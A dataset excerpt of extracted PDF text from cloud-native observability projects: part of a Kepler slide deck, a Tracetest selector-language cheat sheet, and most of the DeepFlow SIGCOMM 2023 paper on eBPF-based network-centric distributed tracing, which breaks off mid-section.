Landscape and Use Cases \n•Open Source Projects \n–PowerAPI \n•https://github.com/powerapi-ng \n–Scaphandre \n•https://github.com/hubblo-org/scaphandre \n•Kepler Design Principle: \n–Container Native, Cloud Native \n–Lightweight, Expansible \n–Accurate and Fair #ossummit \nPerformance Per Watt \nDVFS based performance per watt tuning yields promising energy savings Workload: sysbench \nPlatform: Intel Xeon Sandy Bridge " } ]
{ "category": "Observability and Analysis", "file_name": "SL_cheat_sheet.pdf", "project_name": "Tracetest", "subcategory": "Observability" }
[ { "data": "B a s i c s e l e c t o r s\nG r o u p i n g s e l e c t o r sP s e u d o - c l a s s e sC o m b i n a t o r sE m p t y s e l e c t o r\nA N D o p e r a t o rT r a c e s t r u c t u r a l p s e u d o - c l a s s e sD e s c e n d a n t c o m b i n a t o rO R o p e r a t o r\nA t t r i b u t e s e l e c t o rSelect all spans in a trace. \nExample:\nSelect all the matching spans by applying an AND \ncondition between the given attributes.\n\nSyntax:These pseudo-classes relate to the location of a \nspan within the trace waterfall.\n\nSyntax:The “ ” (space) combinator selects spans that \nare descendants of the first span.\n\nSyntax:Select all the matching spans by applying an OR \ncondition between the given selectors.\n\nSyntax:\nSelect all spans that have the given attribute.\nSyntax:\nExamples:Examples: Examples:\nExamples:Examples:Examples:\n// An empty selector is an empty string\nspan [ attr 1 = \" value \" attr 2 = \" value \"]// Select the first span from the matching lis t\n// Select the last span from the matching lis t\n// Select a span from the matching list based \non a given index (n starts at 1)\nspan [ attr = \" value \"] :firs t\n\nspan [ attr = \" value \"] :las t\n\nspan [ attr = \" value \"] :nth _ child(n)span [ attr 1 = \" value \"] span [ attr 2 = \" value \"]span [ attr 1 = \" value \"], span [ attr 2 = \" value \"]\nspan [ attr = \" value \"]\nspan [ attr contains \" value \"]\n// Select all spans of type htt p\n// Select all spans where the service name \ncontains the word \" api \"\nspan [ tracetest.span.type = \" http \"]\n\nspan [ service.name contains \" api \"]// Select all spans of type http and with \nservice name \" cart-api \"\nspan [ tracetest.span.type = \" http \" \nservice.name = \" cart-api \"]// Select the first span of type htt p\n// Select the last span of type htt p\n// Select the third span of type htt p\nspan [ tracetest.span.type = \" http \"] :firs t\n\nspan [ tracetest.span.type = \" http \"] :las t\n\nspan [ tracetest.span.type = \" http \"] :nth _ child( 3 )\n// Select all spans of type http that are \ndescendants of the span with service name \" cart-api \"\nspan [ service.name = \" cart-api \"] \nspan [ tracetest.span.type = \" http \"]// Select all spans with service name \" api-\nproduct \" or service name \" api-cart \"\nspan [ service.name = \" api-product \"], \nspan [ service.name = \" api-cart \"]The Tracetest Selector L anguage defines the \npattern to select spans to which a set of \nassertions are then applied. Tracetest Selectors \ncan be grouped into the following categories based \non the type of spans they can select:T r a c e t e s t C h e a t S h e e tR e a d t h e c o m p l e t e d o c u m e n t a t i o n f o r t h e T r a c e t e s t S e l e c t o r \nL a n g u a g e h e r e" } ]
{ "category": "Observability and Analysis", "file_name": "deepflow_sigcomm2023.pdf", "project_name": "DeepFlow", "subcategory": "Observability" }
[ { "data": "Network-Centric Distributed Tracing with DeepFlow:\nTroubleshooting Your Microservices in Zero Code\nJunxian Shen1 2◦, Han Zhang1 4•, Yang Xiang2★, Xingang Shi1 4, Xinrui Li3, Yunxi Shen3, Zijian\nZhang1 2, Yongxiang Wu3, Xia Yin3 4, Jilong Wang1 4, Mingwei Xu1 4, Yahui Li1, Jiping Yin2,\nJianchang Song2, Zhuofeng Li2, Runjie Nie2\n1Institute for Network Sciences and Cyberspace, Tsinghua University\n2Yunshan Networks\n3Department of Computer Science and Technology, Tsinghua University\n4Zhongguancun Laboratory\n◦shenjx22@mails.tsinghua.edu.cn•zhhan@tsinghua.edu.cn★xiangyang@yunshan.net\nABSTRACT\nMicroservices are becoming more complicated, posing new chal-\nlenges for traditional performance monitoring solutions. On the\none hand, the rapid evolution of microservices places a significant\nburden on the utilization and maintenance of existing distributed\ntracing frameworks. On the other hand, complex infrastructure\nincreases the probability of network performance problems and cre-\nates more blind spots on the network side. In this paper, we present\nDeepFlow , a network-centric distributed tracing framework for\ntroubleshooting microservices. DeepFlow provides out-of-the-box\ntracing via a network-centric tracing plane and implicit context\npropagation. In addition, it eliminates blind spots in network in-\nfrastructure, captures network metrics in a low-cost way, and en-\nhances correlation between different components and layers. We\ndemonstrate analytically and empirically that DeepFlow is capable\nof locating microservice performance anomalies with negligible\noverhead. DeepFlow has already identified over 71 critical perfor-\nmance anomalies for more than 26 companies and has been utilized\nby hundreds of individual developers. Our production evaluations\ndemonstrate that DeepFlow is able to save users hours of instru-\nmentation efforts and reduce troubleshooting time from several\nhours to just a few minutes.\nCCS CONCEPTS\n•Networks →Network monitoring ;Network performance\nanalysis ;Network measurement ;\nKEYWORDS\nDistributed Tracing; Application Performance Monitoring; Network\nPerformance Monitoring; eBPF\nACM Reference Format:\nJunxian Shen1 2◦, Han Zhang1 4•, Yang Xiang2★, Xingang Shi1 4, Xinrui Li3,\nYunxi Shen3, Zijian Zhang1 2, Yongxiang Wu3, Xia Yin3 4, Jilong Wang1 4,\nHan Zhang is the corresponding author.\nPermission to make digital or hard copies of part or all of this work for personal or\nclassroom use is granted without fee provided that copies are not made or distributed\nfor profit or commercial advantage and that copies bear this notice and the full citation\non the first page. Copyrights for third-party components of this work must be honored.\nFor all other uses, contact the owner/author(s).\nACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\n©2023 Copyright held by the owner/author(s).\nACM ISBN 979-8-4007-0236-5/23/09.\nhttps://doi.org/10.1145/3603269.3604823Mingwei Xu1 4, Yahui Li1, Jiping Yin2, Jianchang Song2, Zhuofeng Li2, Run-\njie Nie2. 2023. Network-Centric Distributed Tracing with DeepFlow : Trou-\nbleshooting Your Microservices in Zero Code. In ACM SIGCOMM 2023 Con-\nference (ACM SIGCOMM ’23), September 10, 2023, New York, NY, USA. ACM,\nNew York, NY, USA, 18 pages. https://doi.org/10.1145/3603269.3604823\n1 INTRODUCTION\nLarge-scale online services have already departed the stage of\nmonolithic applications. Common distributed systems, such as dis-\ntributed computing [ 4,5], container orchestration [ 37], and cloud\nplatforms [ 40,52], are frequently used to host applications such\nas machine learning [ 2,49], microservices [ 44], and network func-\ntion virtualization [ 46]. Because of decoupling, distributed systems\nhave better scalability, flexibility, and availability than monolithic\nsystems.\nA high degree of decoupling, however, is a double-edged sword.\nDue to the heterogeneity and complexity of component interactions,\nit imposes a strain on the operation and maintenance of distributed\nsystems, particularly those developed and deployed under a mi-\ncroservice architecture. To overcome the challenge of performance\ndebugging in distributed systems, state-of-the-art solutions, also\nknown as distributed tracing [13,62,64,91,121,141], try to obtain\nexecution duration and causality by adding instrumentation code to\ndifferent components. While traditional distributed tracing frame-\nworks work well for general services, they are still confronted with\ntwo problems when applied to microservice scenarios.\nFirst, existing traditional frameworks are ineffective and in-\nefficient for rapidly evolving microservices . According to our\nsurvey, in many production environments, various OS kernel ver-\nsions coexist, and application components are often written in\nmultiple languages. Meanwhile, the topology of microservices is\nbecoming increasingly intricate, with some containing as many as\n1,500 components [ 89]. For users manually performing distributed\ntracing, they may not have the time to instrument every single com-\nponent prior to the deployment to production. For the developers\nof the tracing frameworks [ 62,141], maintaining software devel-\nopment kits (SDKs) for various languages and kernel versions is\ntime-consuming. Our survey shows that it often takes users hours to\ninstrument tens of lines of code for a single component, indicating\nthat current distributed tracing frameworks still lack usability.\nSecond, traditional methods disregard network information\nand only record application-level traces . Communications in\n1ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\nmicroservices are substantially more complex compared to typical\ndistributed systems such as big data analytics, which often use the\nsame transmission protocol. AWS Lambda [ 8], for instance, can sup-\nport up to 29different types of interactions with other services [ 76].\nHowever, existing tracing techniques neglect either physical or\nvirtual network information, making root cause analysis more dif-\nficult in such circumstances. Even though some frameworks can\ninclude sidecar information (e.g., Envoy [ 110]) to infer certain time-\npoints in the network, users are unable to bridge the semantic gap\nbetween the application layer and the network layer due to blind\nspots in the network infrastructure and the absence of network\nmetrics. For example, when a network failure causes an increase in\nlatency, application-level tracing tools can only identify duration\nchanges between invocations of different services, whereas net-\nwork monitoring tools have trouble locating anomalies in low-level,\nhigh-volume packets. Customers of DeepFlow have reported that\nnetwork infrastructure is the root cause of 47.3%of performance\nissues, which makes the situation worse.\nDeepFlow Framework. This paper tackles the above challenges\nby introducing DeepFlow , a distributed tracing framework intended\nspecifically for microservices. DeepFlow facilitates both out-of-\nthe-box tracing andrapid performance problem location with\nthe following designs:\nFirst, based on the insight that microservices are triggered by net-\nwork communication, DeepFlow designs a network-centric tracing\nplane (Section 3.2). In its narrow-waist network-centric instrumen-\ntation model, pre-defined kernel hooks are used to perform auto-\nmatic and non-intrusive tracing. DeepFlow leverages the privileged\nkernel space to eliminate the blind spots caused by closed-source\ncomponents and network infrastructure. Moreover, the kernel space\nenables DeepFlow to retrieve network metrics, such as TCP retrans-\nmissions, and attach them to traces.\nSecond, DeepFlow proposes an implicit context propagation tech-\nnique to achieve out-of-the-box tracing and avoid inserting identi-\nfiers into the packets (Section 3.3). Our system automatically lever-\nages the information gathered during the instrumentation phase to\nconstruct the life spans of components. After that, we use various\nnetwork and system information to assemble spans into traces.\nFinally, DeepFlow uses tag-based correlation to provide a connec-\ntion between metrics and traces (Section 3.4). With the assistance of\nthese tags, users may examine network/component metrics related\nto traces, thus accelerating the root cause analysis. To minimize\nthe computation and storage overhead, we further design a smart\nencoding of these tags.\nContributions. DeepFlow has been in production for two years,\nduring which time it has identified over 71critical performance\nanomalies for more than 26companies and has been utilized by hun-\ndreds of individual developers. DeepFlow is now publicly available\nat: https://github.com/deepflowio/deepflow under an Apache-2.0\nlicense. It has joined the CNCF landscape [38] and the eBPF appli-\ncation landscape [29].\nIn summary, our main contributions are:\n1.We conduct a wide study of microservices running in various\nbusiness environments and raise a new understanding of the\ncritical requirements for their effective distributed tracing\n(Section 2).2.We design DeepFlow , a distributed tracing framework that\nfacilitates network-centric troubleshooting of microservices.\nIt offers automatic and non-intrusive instrumentation, elimi-\nnates network blind spots, and effectively correlates network\nmetrics with application traces. We implement and provide\nit as an out-of-the-box tool and will contribute it to the com-\nmunity for further improvements (Section 3).\n3.We perform comprehensive evaluations both in production\n(Section 4) and testbed environments (Section 5). Our pro-\nduction results indicate that DeepFlow can save users hours\nof instrumentation efforts and reduce troubleshooting time\nfrom several hours to just a few minutes. The testbed evalu-\nations show that DeepFlow incurs an overhead of no more\nthan 7%.\nThe remainder of this paper is organized as follows: In Section 2,\nwe discuss the background and motivation. In Section 3, we provide\nan overview of DeepFlow and present our design. We show the real-\nworld production results in Section 4 and evaluate DeepFlow with\nour testbed in Section 5. Section 6 is related work, and Section 7 is\nthe conclusion.\n2 BACKGROUND AND MOTIVATION\nThis section begins with an introduction to observability and dis-\ntributed tracing (Section 2.1). Then, we provide a summary of the\nnew requirements imposed by microservice scenarios (Section 2.2)\nand provide the motivation for DeepFlow (Section 2.3).\n2.1 Observability and Distributed Tracing\nObservability tools are currently utilized to gain crucial insights\ninto complex distributed systems. By collecting information such\nas system states, they enable operators to conduct performance\ntroubleshooting tasks such as data monitoring, root cause analysis,\nand system diagnostics. The data sources for observability tools\nconsist of three primary components [ 13]: (i) aggregatable, frag-\nmented metrics ; (ii) event-driven logging with natural semantics;\nand (iii) request-oriented, workflow-centric tracing .\nFigure 1: A distributed trace consisting of three spans.\nIn contrast to the more general concept of tracing, distributed\ntracing specifically focuses on the diagnosis and troubleshooting\nof distributed systems. It distinguishes itself from the other two ob-\nservability pillars by providing an indispensable end-to-end request-\noriented view of a transaction. The outputs of distributed tracing,\nspecifically referred to as distributed traces [62,64,91,121,141], con-\nsist of two types of information: (i) the life cycle (i.e., spans [ 121])\nand correlated metrics within each component; and (ii) the causal\nrelationships and execution sequences between spans. Figure 1\n2Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\nillustrates an example of a distributed trace obtained in a simple\nmicroservice scenario. In this example, component A receives a\nrequest from a user, begins execution, and then sends a new re-\nquest to component B while awaiting a response. The execution\nin component A proceeds once component B has completed its\nprocess and sent back a response. Finally, component A returns\nthe execution results to the user through a response. Using the\nsending and receiving of requests and responses as beginnings and\nendings, the above procedure will generate a trace with three spans\nthat denote distinct execution phases in each component. The trace\nprovides a clear picture of how component A invokes component\nB and how long the execution takes in each component.\nThe primary objective of distributed tracing is to use spans as\nboundaries to subdivide end-to-end latency into finer units and pro-\nduce workflow-centric outputs. Nevertheless, most of the current\nframeworks [ 6,62,141] mainly focus on application-level compo-\nnents and ignore the network infrastructure. In this paper, we refer\nto the components not detected by the distributed tracing frame-\nwork and spans that should be but are not covered by distributed\ntraces as blind spots . Blind spots in network infrastructure will re-\nduce the number of spans, obscure the execution stage boundary,\nand lead to ambiguous information in traces.\n2.2 New Distributed Tracing Requirements\n(a) Network infrastructure is complicated\nand prone to failure.\n(b) The virtual network is the weakest\nspot in network infrastructure.\nFigure 2: Sources of performance anomalies.\n2.2.1 Error-Prone Network Infrastructure. Figure 2 depicts a sur-\nvey result of the source locations of real-world microservice fail-\nures in the production environment. The results of this survey\nwere obtained by gathering and analysing the microservice fail-\nures reported by DeepFlow ’s 26 enterprise clients. As shown in\nFigure 2(a), it is obvious to draw the conclusion that the network\ninfrastructure ( 47.3%) and the applications themselves ( 32.7%) are\nthe most frequent sources of performance issues. Failures resulting\nfrom computing infrastructure, such as containers, are less frequent\n(12.7%). In addition, rapid surges in external traffic ( 7.3%), owing to\nattacks and other reasons, are also a failure source.\nFigure 2(b) examines the composition of network-side perfor-\nmance breakdowns in further detail. The virtual network is mostsusceptible to performance issues, with 30.8%of failures occur-\nring. Furthermore, the physical network (e.g., physical NIC), net-\nwork middleware (e.g., message queues [ 128]), cluster services (e.g.,\nDNS [ 21], gateway), and node configuration (e.g., Linux firewall\nsettings) can all contribute to anomalies.\nThe above results demonstrate that the network infrastructure\nis susceptible to performance problems and should be a top prior-\nity for distributed tracing systems. However, current distributed\ntracing frameworks do not capture network information. When\nthere is a network performance anomaly, users cannot identify the\nresponsible device.\n2.2.2 Typical In-Production Microservice Scenarios. Missing net-\nwork information is merely one of the major problems that existing\ntechnologies encounter. To further illustrate the new requirements\nfor distributed tracing, we present four typical real-world production\ncases from our enterprise customers (Table 1).\nScenarios Convenience Portability Stability Coverage Correlation\nCross-Dept Debug ✓ ✓\nOnline Game Ops ✓ ✓ ✓\nInfra Services ✓ ✓ ✓ ✓\nAgile Dev ✓ ✓ ✓ ✓ ✓\nTable 1: New requirements for distributed tracing.\nScenario 1 - Cross-department performance debugging is, ac-\ncording to our survey, one of the most common issues experienced\nby large companies. This time-consuming task requires the col-\nlaboration of various departments, including infrastructure teams,\ndevelopers, and operators. To enable rapid problem location, traces\nshould ensure coverage and reduce blind spots on the infrastructure\nside. Additionally, tracing frameworks should not only extract re-\nquest information. They have to offer strong correlation capabilities\nto combine the semantics at various levels of the applications, pods,\nand physical machines.\nScenario 2 - Online game operations are a classic platform\nhosting scenario [ 42,97] that is also highly distinctive among our\nreal-world customer examples. Vendors deliver back-ends and up-\ndate packages to the platform, which is then responsible for oper-\nation and maintenance. Game back-ends are often closed-source\nfor commercial reasons, making it impossible for the developers\nto manually inject the tracing application programming interfaces\n(APIs) provided by the operators. Apart from correlation , this de-\nlivery approach necessitates that the distributed tracing system be\nable to detect closed-source components for coverage . Also, mon-\nitoring tools should be stable and not affect the performance of\nonline game backends that are sensitive to latency.\nScenario 3 - Developing infrastructure services for use by other\ndepartments is one of the scenarios that DeepFlow users are most\nconcerned with. In this situation, distributed tracing frameworks\nmust be capable of widespread adoption. It should, first and fore-\nmost, be stable and portable , running reliably on top of various\nsystems and language runtimes. Second, high coverage and strong\n3ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\ncorrelation are required in large enterprises with complicated in-\nfrastructures.\nScenario 4 - Agile microservice development has the strictest\nrequirements for distributed tracing. First, to keep up with the\nfrequent changes in components and service topologies, tracing\nframeworks must be user-friendly . Second, the portability ,stability ,\nandcoverage are put to the test by the numerous third-party com-\nponents introduced by microservice developers, including caching\nsystems [ 94,113], databases [ 22,122], reverse proxies [ 32], and web\nframeworks [ 33,39]. Lastly, microservices are typically deployed\non resource orchestration platforms [ 37,40], which increases the\nchallenge of correlation .\n2.3 Motivating DeepFlow\nUnfortunately, modern distributed tracing systems are falling be-\nhind the times, especially when it comes to satisfying the afore-\nmentioned new requirements. As shown in Table 1, we divide the\ndemands into two categories: out-of-the-box tracing and rapid\nproblem location. Then we classify existing frameworks into two\ntypes based on their instrumentation approaches, intrusive and\nnon-intrusive , and characterize their limitations.\nOut-of-the-Box Tracing Rapid Problem Location\nDistributed Tracing\nConvenience Portability Stability Coverage Correlation\nManual\nIntrusive\nAutomatic\nUser Space\nNon-Intrusive\nKernel Space\nTable 2: Existing frameworks are incapable of meeting the\nnew demands imposed by microservices. ,, and corre-\nspond to unsupported, partially supported, and fully sup-\nported, respectively.\nIntrusive Distributed Tracing Frameworks. Intrusive frame-\nworks implement distributed tracing by modifying the source code\nof target components. Depending on whether this modification\nis performed automatically, intrusive frameworks can be further\ncategorized as manual or automatic. The former [ 43,55,62,91,141]\nrequires users to read the relevant component code and instrument\nit at specific points, whereas the latter [ 63,92,101,115] employs\ntechniques such as bytecode instrumentation [ 100] to intercept\ncertain pre-defined functions or methods.\nAlthough intrusive frameworks have extensive tracing capa-\nbilities, the information they provide is insufficient to locate the\nperformance issues . Spans are restricted inside open-source compo-\nnents, and little is known about closed-source components or the\nunderlying sophisticated network infrastructure. These blind spots\nwaste valuable debugging time in communication among different\ncomponent developers.\nAdditionally, intrusive frameworks create a significant burden on\nusers and framework developers . On the one hand, instrumentation\nis often identified as time-consuming and challenging [ 16,34,65,\n116,120]. On the other hand, as illustrated in Figure 3, a substantial\namount of effort is still necessary for developers to maintain the\nFigure 3: LOCs of distributed tracing SDK repositories.\nrespective SDKs for each language and kernel. Moreover, to deploy\nor update an intrusive distributed tracing framework, users must\nrecompile and redeploy all relevant microservice components.\nNon-intrusive Distributed Tracing Frameworks. In order to\navoid modifications, non-intrusive tracing is achieved by capturing\nthe external interaction interfaces of microservice components. Ex-\nisting frameworks [ 47,56,72,107,118,121,132,135,137] employ\ntechniques like instrumenting the remote procedure call (RPC) seri-\nalization library, pre-loading libc, and developing kernel modules.\nThese frameworks, however, are unable to simultaneously pro-\nvide rapid problem location and out-of-the-box tracing . First, instru-\nmentation capabilities and isolation boundaries limit user-space\nimplementations and create blind spots. These blind spots in closed-\nsource software and network infrastructure make it harder to locate\nproblems. Second, current kernel-space frameworks are difficult to\ndeploy and use. Kernel modules are prone to crashing [ 27,108] and\nare difficult to maintain across different kernel versions.\nTo summarize, existing intrusive or non-intrusive frameworks\neach have their own benefits, but they cannot simultaneously pro-\nvide convenience, portability, stability, coverage, and correlation.\n2.3.1 Opportunities by eBPF. As a kernel-supported mechanism,\neBPF (extended Berkeley Packet Filter) [ 28,90,93,99] presents un-\nprecedented opportunities for simultaneously achieving the afore-\nmentioned objectives. It functions by providing a virtual machine in\nthe kernel that enables the execution of small pieces of code, known\nasBPF programs , written by users and loaded by the BPF program\nloader [ 23,82]. With the help of BTF (BPF Type Format) [ 83], these\nprograms are portable across different kernel versions. With kernel\nprivileges and visibility, these programs can be attached to different\ntypes of hooks (i.e., trigger functions) [ 66], allowing them to be\nexecuted in response to various events such as a system call or a\nuser space function call. Attachment, triggering, execution, and\ndetachment of BPF programs are non-intrusive and in-flight, which\nmeans that no modification, recompilation, or redeployment of the\nmonitored application is required. In addition, these programs are\nvalidated by the eBPF verifier [ 67] prior to execution, allowing BPF\nprograms to access and manipulate kernel data structures without\ncrashing the kernel.\n3 THE DEEPFLOW SYSTEM\nIn this section, we first provide the design goals of DeepFlow and\nits overall architecture (Section 3.1). Then, we elaborate on the\nthree design aspects of DeepFlow : network-centric tracing plane\n(Section 3.2), implicit context propagation (Section 3.3), and tag-\nbased correlation (Section 3.4).\n4Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\nFigure 4: Architecture overview of DeepFlow .Ingress System Calls\nrecvmsg\nrecvmmsg\nreadv\nread\nrecvfrom\nEgress System Call\nsendmsg\nsendmmsg\nwritev\nwrite\nsendto\nTable 3: Network-centric instru-\nmented ABIs of DeepFlow .\n3.1 DeepFlow Overview\nThe limitations of existing tools discussed in Section 2 lead to the\nfollowing high-level design goals for DeepFlow :\n•Goal 1: Instrumentation Convenience. First, users are not\nrequired to determine where to conduct the instrumentation.\nSecond, users can instrument target components without\ndirectly modifying their code.\n•Goal 2: Maintenance Simplicity. First, developers do not\nneed to maintain multiple implementations or SDKs of the\nsame framework for different languages or applications. Sec-\nond, developers are not required to offer several implemen-\ntations of the same interface dependent on kernel changes.\nFinally, DeepFlow should be stable and secure.\n•Goal 3: High Accuracy and Coverage. DeepFlow must\nensure thorough and accurate tracing. It should avoid blind\nspots in the closed-source components, cloud infrastructure,\nand underlying network.\n•Goal 4: Cross-Layer and Cross-Component Correlation.\nDeepFlow must have effective cross-layer information inte-\ngration capabilities to build correlations . On the other hand,\nit must be able to correlate the data properties provided by\ndifferent components for additional analysis.\n•Goal 5: High Performance. DeepFlow must have negli-\ngible instrumentation, transmission, and processing overhead\nin order to provide real-time distributed tracing without\ndegrading application performance.\nConsidering these design goals, we present the overall architec-\nture of our system in Figure 4. DeepFlow consists of two high-level\ncomponents: Agent andServer . An Agent is deployed in each\ncontainer node, virtual machine, or physical machine to capture\ntrace data using pre-defined eBPF instrumentation hooks and in-\nstrumentation extensions. In addition, the Agent is responsible\nfor integrating metrics and tags from third-party frameworks or\ncloud platforms and transmitting them to the Server. The DeepFlow\nServer is a cluster-level process. It is responsible for storing spans\nin the database and assembling them into traces when users query.3.2 Network-Centric Tracing Plane\nInstrumentation is the foundation of the entire distributed tracing\nsystem. With a precise microservice execution abstraction and auto-\nmatic non-intrusive instrumentation, we create a high-performance,\nindependent, network-centric tracing plane in the kernel space.\n3.2.1 Microservice Execution Abstraction. To facilitate instru-\nmentation and maintenance, DeepFlow extends interface-level dis-\ntributed tracing and selects a collection of system call application\nbinary interfaces (ABIs) as the basic instrumentation points. Choos-\ning system call ABIs over library functions enables DeepFlow to\nhave the highest degree of development generality, i.e., only one\nsingle framework is required to build support for various languages\nand kernel versions ( Goal 2 ). In addition, users can gather primary\ntrace data through these pre-defined interfaces without having\nto adapt to different microservice components ( Goal 1 ). Never-\ntheless, regardless of the complexity of microservice components’\nlogic, DeepFlow must ensure that these pre-defined instrumenta-\ntion points do not miss critical trace spans ( Goal 3 ) when compared\nto manual instrumentation. Meanwhile, DeepFlow should achieve\nhigh performance ( Goal 5 ).\n⋆Design 1: A narrow-waist instrumentation model with\ntwo sets of functions: ingress-egress and enter-exit. Regard-\nless of diversity and complexity, the execution of a microservice\ncomponent is triggered by its communication. Therefore, DeepFlow\nignores the control flow information and bases the trace collection\nprocedure on the ingress-egress behaviors.\nAs revealed in Table 3, DeepFlow instruments ten system call\nABIs and classifies them as ingress or egress . These ABIs are ca-\npable of covering all data communication scenarios (blocking or\nnon-blocking, synchronous or asynchronous) between microser-\nvice components while remaining independent of application logic\nand communication protocols. Notably, neither ingress nor egress\ncorresponds directly to a request or a response. For a client-side\ncomponent, an egress message corresponds to a request, while\nan ingress message relates to a response. On the other hand, a\nserver-side component operates in the exact opposite way. The\nrequest-response inference is introduced in Section 3.3.\n5ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\nDeepFlow stores information about each ingress or egress call\nas it enters or exits the kernel. Four categories of information\nare recorded for further processing in the user space: (i) Program\ninformation, including process ID, thread ID, coroutine ID, pro-\ngram name, etc.; (ii) Network information, including the DeepFlow -\nassigned global unique socket ID, five-tuple, the TCP sequence,\netc.; (iii) Tracing information, including data capture timestamp,\ningress/egress direction, etc.; and (iv) System call information, such\nas the total length of read/write data, payload to be transferred\nto the DeepFlow agent, and so on. With the information above,\nDeepFlow can provide a universal abstraction for the tracing plane\nand accomplish the aforementioned objectives.\nInstrumentation Extensions. DeepFlow provides three types of\ninstrumentation extensions to respond adaptably to varied con-\nditions. First, DeepFlow integrates network data from the classic\nBerkeley Packet Filter (cBPF [ 69]) and AF_PACKETS [ 84] to derive\nNIC-side information. Second, the use of uprobe [70] enables the\ninterception of code in any location in the user space. This grants\nDeepFlow easy access to important information, such as the orig-\ninal payload prior to TLS encryption. Lastly, DeepFlow enables\nthe incorporation of traces from third-party distributed tracing\nframeworks (e.g., OpenTelemetry [ 103]). This enables DeepFlow\nto maintain overall compatibility while granting users the greatest\ninstrumentation flexibility.\nFigure 5: DeepFlow collects message data and network met-\nrics in the kernel space via pre-defined hooks.\n3.2.2 Automatic Non-Intrusive Instrumentation. The network-\noriented instrumentation model is merely the first step toward\nachieving our goals. DeepFlow seeks to make further efforts by\nautomating instrumentation , relieving users of the time-consuming\ntask of modifying code ( Goal 1 ). The framework should also be\nnon-intrusive to capture trace data from closed-source applications\nand network infrastructure ( Goal 3 ). Finally, network metrics from\ndifferent layers should be captured in zero code (Goal 4 ).⋆Design 2: In-kernel hook-based instrumentation. In ac-\ncordance with the pre-defined instrumentation model, DeepFlow\nautomatically registers hooks to collect trace data, as shown in Fig-\nure 5. For message ingress ( ➀) or egress ( ➁), the corresponding\nsystem call will trigger the registered kprobe or tracepoint [ 68,71]\nhooks when it enters ( ➃) and exits ( ➄) the kernel. The tracing\nprocess will retrieve the arguments ( ➆), wait for the kernel to com-\nplete its processing, and then retrieve the returned results ( ➇). The\npreliminary parser ( ➈) will integrate and enqueue the primary data\ninto the buffer ( ➉), which will subsequently be transmitted to the\nuser space for further processing. Additionally, DeepFlow utilizes\nuprobes and uretprobes [ 70] to extract information ( ➅) from ex-\ntended instrumentation points within the component’s logic ( ➂).\nAll of the operations are executed automatically. Users can perform\ndistributed tracing in zero code .\nInstead of collecting traces from the GNU C library [ 135] or seri-\nalization libraries [ 137],DeepFlow runs in the kernel space based on\neBPF . The kernel privileges permit DeepFlow to access information\n(e.g., message content, TCP sequence, socket flags, etc.) at multiple\nnetwork layers of different components. Changing a single library,\non the other hand, makes it hard to get this information because\nof privilege limits and isolation boundaries. Moreover, the kernel\nprovides unified structured data across all types of components,\nwhich means that the data produced by DeepFlow has a consistent\nstructure. Because of this, it is easier and more efficient to combine,\nassociate, and store traces.\nDeepFlow implements the trace data collection module based\non eBPF [ 66,69]. Since eBPF programs can directly monitor any\non-the-fly programs, DeepFlow can be deployed in zero code at any\ntime, and users no longer need to restart active online microservices.\nThanks to the eBPF verifier [ 67],DeepFlow will not result in kernel\ncrashes, which is quite a common issue in kernel modules [ 27,108].\n3.3 Implicit Context Propagation\nDeepFlow ’s network-centric tracing plane enables the recording\nof extensive monitoring information and eliminates blind spots in\nnetwork infrastructure. However, as stated in Section 2, achieving\ncomprehensive and efficient troubleshooting necessitates more than\nindependent, fragmented, and primitive information. In this section,\nwe demonstrate how DeepFlow constructs the spans and traces\nspecified in Section 2.1 using the data collected in Section 3.2.\nTraditional distributed tracing frameworks modify the source\ncode [ 64] or serialization libraries [ 121,137] to explicitly insert\ncontext information into the headers [ 105,130] or payloads [ 45]\nof messages. Per-message unique identifiers generated by frame-\nworks [ 62,91,141] (e.g., trace IDs and span IDs) are encoded in\ncontext information and propagated with the transmission of mes-\nsages. Using these unique identifiers, it is straightforward to aggre-\ngate data collected during the sending and receiving of requests\nand responses to produce spans and the trace of the same message.\nDespite its seeming simplicity, this technique, also known as ex-\nplicit context propagation , requires that the users be familiar with\nthe core logic of the microservice components being monitored.\nUsers must either apply the semi-automatic APIs [ 125] provided\nby the tracing framework or manually define the start and end of\nspans [ 20]. This intrusive nature of explicit context propagation\n6Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\nseverely restricts instrumentation convenience ( Goal 1 ) and main-\ntenance simplicity ( Goal 2 ). Additionally, if the application layer\nprotocol prohibits header modification, the framework would risk\ncorrupting messages by altering their payloads.\n⋆Design 3: Implicit context propagation with hierarchical\naggregation. DeepFlow suggests implicit context propagation as\na solution to the non-intrusive construction of spans and traces,\nwhere context information is no longer transmitted along with\nmessages. Our key insight is that the information required for con-\ntext propagation is already contained in network-related data . By\nmaximizing the utilization of data from each network layer, Deep-\nFlow does not need to explicitly include context information within\nthe message. In general, DeepFlow combines independent, frag-\nmented, and primitive measurements into request-oriented traces\ncontaining precise causal correlations through the following two\nphases: (i) constructing spans from the instrumentation data and (ii)\nassembling traces from spans using implicit causal relationships.\n3.3.1 Construction of a Single Span. Similar to the majority of\ndistributed tracing frameworks [ 62,121,141],DeepFlow generates\nspans that always begin with a request and end with a response\n(Figure 1). Execution models with one-to-many, many-to-one, and\nmany-to-many communication patterns in a single connection , such\nas streaming and message subscription, are beyond the scope of this\npaper. In addition, we presume that every microservice component\nshould return a response in response to a request. This constraint\nis regarded reasonable due to the fact that if a microservice compo-\nnent fails to return a response, the component that invoked it will\nbe unable to determine whether or not the requested action was\nexecuted successfully. DeepFlow considers any missing responses\nas outcomes resulting from unexpected execution terminations.\nFigure 6 depicts the three phases of our span construction proce-\ndure: message data production, message type inference, and session\naggregation. Firstly, DeepFlow associates information captured dur-\ning the enter and exit of the same system call by using process IDs\nand thread IDs (➆and➇of Figure 5). The association is predicated\non the fact that the kernel can simultaneously handle only one\nselected system call (listed in Table 3) for a given (𝑃𝑟𝑜𝑐𝑒𝑠𝑠 _𝐼𝐷,\n𝑇ℎ𝑟𝑒𝑎𝑑 _𝐼𝐷). For languages such as Golang [ 48],DeepFlow moni-\ntors the creation of coroutines to save the parent-child coroutine\nrelationship in a pseudo-thread structure and performs similar oper-\nations. DeepFlow temporarily saves the 